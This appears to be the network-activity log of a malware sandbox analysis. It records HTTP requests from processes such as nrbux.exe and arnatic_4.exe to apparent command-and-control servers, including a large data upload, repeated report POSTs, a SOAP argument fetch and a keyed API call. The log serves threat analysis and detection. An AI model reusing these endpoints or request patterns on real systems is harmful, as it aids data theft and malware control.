185.215.113.55:80
Request
POST /t5BnOoke2/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.55
Content-Length: 84
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Date: Fri, 02 Jul 2021 07:24:52 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8
• flag-unknown
POST
http://185.215.113.55/t5BnOoke2/index.php?scr=1
nrbux.exe
Remote address:
185.215.113.55:80
Request
POST /t5BnOoke2/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----26852cccdc37776d4a2ad18a0a70534d
Host: 185.215.113.55
Content-Length: 89439
Cache-Control: no-cache
• flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:24:52 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b43d310000fa8c79367000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=aZIbpCvx7tcssmutT7Km20LbQJT%2BVjENqLpVw6kZ%2Bj2jOocqoJetp4Yf2iPRuZpaOVozOku%2FYH0ooipeH%2B%2BGBTOOERtvzhhgRFmJB7HFeKoT%2BNgIqBoTc7%2FlR2Z%2FRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686230ebf0efa8c-AMS
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:25:03 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b465930000624d4a8af000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=ltIxD6OAL7U1Uzc6jR7QP4Chqmq5paR%2B40uop44SOQ%2FLnm3WXg%2BYjtc34vn2OmxjEzyYfdJAohl5ABfYeCpn0X%2F7iHfeJPLhTYyKGdrnm%2B8BJKIuQ1qs17rNEaVOHw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686234f5c17624d-OTP
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:25:13 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b48da0000041517b2c0000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=gfisXgFrOfePt6TjZBeFQl4hAX%2BcjCtUCRPq3BBdk2mzLXwZgApQ0AxE%2Ftu2OqPlrOA1V6RD%2FGzwIszRO31HdMeHgRR9gv4E4oJSx0EWrla3kRS1GQ%2Fjukdh8h4mpg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686238f6f314151-HAM
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        www.facebook.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        www.facebook.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        www.facebook.com
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        star-mini.c10r.facebook.com
star-mini.c10r.facebook.com
IN A
31.13.83.36
• flag-unknown
GET
https://www.facebook.com/
arnatic_4.exe
Remote address:
31.13.83.36:443
Request
GET / HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
Host: www.facebook.com
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Alt-Svc: h2="facebook2b5efqy23fbcbpzs5xkfqfuwjc3csaqqvkggj3pkwkb25aid.onion:443"; ma=86400
x-fb-rlafr: 0
Pragma: no-cache
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;
X-Frame-Options: DENY
Strict-Transport-Security: max-age=15552000; preload
Content-Type: text/html; charset="utf-8"
X-FB-Debug: 862ncP7T9reclwX1oFvfPJeZckTEeXyN03AacdbNMazjXJTGmedPgbtWAuHmVKpZdnT5L4yt1WImUpUB7TLiwg==
Date: Fri, 02 Jul 2021 07:25:17 GMT
Priority: u=3,i
Transfer-Encoding: chunked
Connection: keep-alive
• flag-unknown
GET
http://uyg5wye.2ihsfa.com/api/fbtime
arnatic_4.exe
Remote address:
88.218.92.148:80
Request
GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: uyg5wye.2ihsfa.com
Response
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Jul 2021 07:25:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.21
• flag-unknown
POST
http://uyg5wye.2ihsfa.com/api/?sid=294199&key=5064a966816af6ace47aab1ab46f52fa
arnatic_4.exe
Remote address:
88.218.92.148:80
Request
POST /api/?sid=294199&key=5064a966816af6ace47aab1ab46f52fa HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uyg5wye.2ihsfa.com
Response
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Jul 2021 07:25:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.21
• flag-unknown
POST
http://iw.gamegame.info/report7.4.php
SystemNetworkService
Remote address:
104.21.21.221:80
Request
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: iw.gamegame.info
Content-Length: 278
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:25:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Chl-Bypass: 1
Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
X-Frame-Options: SAMEORIGIN
cf-request-id: 0b07b4b5db00001649edbe8000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=QfI3XFSe3TXkxsEEFHBkVnPmZ33aBDNIqBWqlQLRJdleIjwK24TK8x%2F2ExB8wetn36%2FMpfdaPa5h02dVLQdM01uo5k1f0acw%2F2WiQ88gvXsD6LVuD5cGx0DUPumuXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 668623cfce8b1649-MUC
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
• flag-unknown
POST
http://87.251.71.195:82/
arnatic_7.exe
Remote address:
87.251.71.195:82
Request
POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
Host: 87.251.71.195:82
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
• flag-unknown
POST
http://iw.gamegame.info/report7.4.php
SystemNetworkService
Remote address:
104.21.21.221:80
Request
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: iw.gamegame.info
Content-Length: 278
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:25:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Chl-Bypass: 1
Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
X-Frame-Options: SAMEORIGIN
cf-request-id: 0b07b4ddbd00007cac29a72000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=A6bn0XJXSH0MzbpNumfGff0h9iu6yQP9wVDy8t7E4P3nqPBm6JSYfZ6nWk3T02iugbmY0DOapvTWdZrQjlzEbXtiulTIK%2BrJy5E3wzumjX7OLUZrmqGLIwaYcHTqcA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6686240f9be67cac-MUC
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://ip-api.com/json/?fields=8198
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        208.95.112.1:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /json/?fields=8198 HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: ip-api.com
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:25:44 GMT
                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                        Content-Length: 58
                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                        X-Ttl: 59
                                                                                                                                                                                        X-Rl: 43
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:25:44 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b507ba000010b9b28d9000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=zqJ2it63oY%2BxSFXLJFaUZQW9xajP%2FnIIQAykGgOyVp4hxeJ3HjZ5nSk87uO7pDG5rsBHc6QZG54vds4va05fW6ZEyon4zT6hVQhZhySDM01bIEK2bgPc8ezim37LgQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66862452cfb410b9-CPH
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:25:53 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:25:55 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07b5300100007377c3976000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=zWcTKeLEC8cBRIqnV9%2FrZDGMrcYSrI0XgEqJDLWfJXqu9cGZ0SrvusZs3wS8oH%2BFplF33R6kPAwCwjmvp2eYxevsvQdgnrvxybOTWyTpYOU9EADb2wIggLmIT9pBoA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668624933e497377-CPH
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 398
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:26:05 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
    Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    X-Frame-Options: SAMEORIGIN
    cf-request-id: 0b07b5584b00001e5d26bbd000000001
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=BjHu6%2Fcu3ycHXJ9WoJ%2F8F6%2FlDNi8qqY5bqTvKm%2FrSiCtT5nijzdrWO%2Bf4kYIspWJm%2FWI0iTsrUjS7g0DoU%2FXZB6wGWppZaVgOfXpHBfxttqUs%2BUDqgUZNBcMs2N4Eg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 668624d3ab0e1e5d-MUC
    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
• flag-unknown
  POST http://iw.gamegame.info/report7.4.php
  SystemNetworkService
  Remote address: 104.21.21.221:80
  Request
    POST /report7.4.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
    Host: iw.gamegame.info
    Content-Length: 398
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response
    HTTP/1.1 403 Forbidden
    Date: Fri, 02 Jul 2021 07:26:15 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    CF-Chl-Bypass: 1
    Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
    Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    X-Frame-Options: SAMEORIGIN
    cf-request-id: 0b07b5803000007cb241a80000000001
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=50F4LQE%2BcwrHES4dvpZMaOz1a47n16f1v8yrdiNScmdFS8MXPiYRLR7asaUjJs7%2FvRoantam%2Bs8lF9gJh0wLj0wVK6qYwujpPg6w41JUM%2F86xg213ns2GuAbsjSbMg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 668625137bc87cb2-MUC
    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
• flag-unknown
  POST http://iw.gamegame.info/report7.4.php
  SystemNetworkService
  Remote address: 104.21.21.221:80
  Request
    POST /report7.4.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
    Host: iw.gamegame.info
    Content-Length: 398
    Connection: Keep-Alive
    Cache-Control: no-cache
  Response
    HTTP/1.1 403 Forbidden
    Date: Fri, 02 Jul 2021 07:26:25 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    CF-Chl-Bypass: 1
